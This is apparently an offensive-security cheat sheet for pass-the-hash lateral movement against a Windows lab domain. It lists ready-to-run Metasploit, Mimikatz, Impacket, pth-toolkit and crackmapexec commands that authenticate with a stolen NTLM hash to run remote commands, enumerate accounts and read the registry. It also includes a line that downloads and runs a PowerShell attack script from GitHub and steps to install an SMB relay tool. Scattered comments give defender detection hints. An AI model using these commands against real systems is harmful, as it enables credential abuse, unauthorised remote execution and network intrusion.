Metasploit Framework (MSF)

# Two msfconsole entry points. The second (psexec) is an authenticated SMB exec module:
# its SMBPass option accepts an LM:NT hash pair in place of a cleartext password (pass-the-hash).
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/psexec
# msfconsole datastore option names are case-insensitive, so `smbpass` resolves to `SMBPass`.
# The 32-zero LM half is a placeholder; NTLM authentication only uses the NT half.
# Defender note: a hash-based logon is protocol-identical to a password logon. It shows up as an
# NTLM network logon (Security 4624, logon type 3); the signal is context — source host, account,
# and NTLM being used where Kerberos would be expected.
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38

Mimikatz

privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Impacket

#SMB
# Impacket scripts and the pth-toolkit / crackmapexec wrappers below all authenticate with the NT
# hash directly. `-hashes` takes LM:NT; the 32-zero LM half is a placeholder, only the NT half is
# used for NTLM. pth-* tools take the same pair after `%` in the `-U` credential string.
# NOTE(review): the `[email protected]` tokens on several lines are an export artifact that
# replaced the original target specifier; those lines are not runnable as printed.
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
# Defender note: psexec-style execution typically drops a service binary on ADMIN$ and installs a
# service (System log 7045) — a well-known, high-confidence detection point.
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
# crackmapexec is marked deprecated further down this page in favour of NetExec (nxc).
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

#WMI
# Defender note: WMI-based execution typically spawns the command as a child of WmiPrvSE.exe,
# which is unusual for interactive tooling and a common hunting pivot.
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
#win
# NOTE(review): the angle brackets around the URL are a markdown-export artifact, not part of the command.
# Supply-chain note: this fetches a script from a third-party repo at its current HEAD (unpinned);
# the content can change between fetches.
wget <https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1>; Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\\hacked" -Verbose
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]

#RPC
# Enumeration only (no command execution) — still authenticated, so the same NTLM logon telemetry applies.
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
pth-net rpc share list -U 'ignite\\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105

#Other
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
# NOTE(review): angle brackets around the URL are an export artifact here as well.
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 <http://192.168.1.105/file.txt>
# Defender note: atexec-style execution typically registers a scheduled task (Security 4698) and
# deletes it afterwards; short-lived task create/delete pairs are the detection signal.
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected] whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
# NOTE(review): the quadrupled backslashes in the registry key path look like an escaping artifact of the export.
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected] query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s

SMB Relay Attack Script

# NOTE(review): the angle brackets around the URL are a markdown-export artifact, not part of the command.
git clone <https://github.com/m4lal0/smbrelay>
# Supply-chain note: clones an unpinned third-party repo and runs its installer; the script at HEAD
# can change at any time, so review it before `--install` and pin a commit for repeatable setups.
cd smbrelay; chmod +x smbrelay.sh
./smbrelay.sh --install

CrackMapExec → NetExec

❌ CrackMapExec

✅ NetExec

# `apt install` needs root. pipx puts each tool in its own virtualenv; `ensurepath` adds pipx's
# bin directory to PATH, which takes effect in a new shell.
apt install pipx git
pipx ensurepath
# NOTE(review): installs from the repository's default branch — unpinned. Pin a tag or commit
# (`git+https://github.com/Pennyw0rth/NetExec@<TAG_OR_COMMIT>`) for a reproducible install.
pipx install git+https://github.com/Pennyw0rth/NetExec

# Start (command names installed by the package)
- NetExec
- nxc
- nxcdb
- netexec